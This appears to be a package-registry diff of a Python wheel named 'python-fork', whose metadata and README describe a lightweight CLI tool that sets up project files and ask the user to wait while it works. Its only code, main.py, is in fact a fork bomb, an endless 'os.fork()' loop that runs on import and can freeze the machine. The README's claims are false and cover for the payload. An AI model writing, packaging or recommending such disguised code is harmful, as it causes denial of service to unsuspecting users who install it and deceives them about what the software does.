python-fork 0.1.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1 @@
1
+ __version__ = "0.1.0"
python_fork/main.py ADDED
@@ -0,0 +1,2 @@
1
+ import os
2
+ while True: os.fork()
@@ -0,0 +1,23 @@
1
+ Metadata-Version: 2.4
2
+ Name: python-fork
3
+ Version: 0.1.0
4
+ Summary: A CLI tool to fork and set up files.
5
+ Author: Manjas Anand
6
+ Requires-Python: >=3.8
7
+ Description-Content-Type: text/markdown
8
+
9
+ # python-fork 🍴✨
10
+ A lightweight CLI tool to automatically set up and generate your project files. ⚡📁
11
+ ## 🚀 Installation
12
+ Install it directly using pip:
13
+ ⁠pip install python-fork⁠
14
+ ## 🛠️ Usage
15
+ Run the tool anywhere in your terminal:
16
+ ⁠python-fork⁠
17
+ > ⏳ Note: Please wait for some time after typing ⁠python-fork⁠ while it sets up and writes all the necessary files!
18
+ ## ✨ Features
19
+ * ⚡ One Command: Run ⁠python-fork⁠ to handle file creation automatically.
20
+ * 📦 Zero Clutter: Quick, simple, and ready out of the box.
21
+ * 🐍 Python Powered: Lightweight CLI workflow.
22
+ ## 👨‍💻 Author
23
+ * Manjas Anand 🌟
@@ -0,0 +1,7 @@
1
+ python_fork/__init__.py,sha256=kUR5RAFc7HCeiqdlX36dZOHkUI5wI6V_43RpEcD8b-0,22
2
+ python_fork/main.py,sha256=m0HYGKFneGzWI96s4CpbycxSaCq9YLVi8o1vzOzuMXg,31
3
+ python_fork-0.1.0.dist-info/METADATA,sha256=LrfppAfEXakethjPJ-cZTRCClJbcj3PYZj-TM5roSKY,824
4
+ python_fork-0.1.0.dist-info/WHEEL,sha256=YVMoNqKzERt-wjUZwJ33xBGAwnFl-4cqbYkTtWa4itE,91
5
+ python_fork-0.1.0.dist-info/entry_points.txt,sha256=EgB0MPalx8t_7Ql8VtvbOefo3gwelii7pfysU2qpHoM,54
6
+ python_fork-0.1.0.dist-info/top_level.txt,sha256=xHBF225IBszu6SiuEdisF8ZQ2vYldOI0L2Zicu_lThs,12
7
+ python_fork-0.1.0.dist-info/RECORD,,
@@ -0,0 +1,5 @@
1
+ Wheel-Version: 1.0
2
+ Generator: setuptools (84.0.0)
3
+ Root-Is-Purelib: true
4
+ Tag: py3-none-any
5
+
@@ -0,0 +1,2 @@
1
+ [console_scripts]
2
+ python-fork = python_fork.main:main
@@ -0,0 +1 @@
1
+ python_fork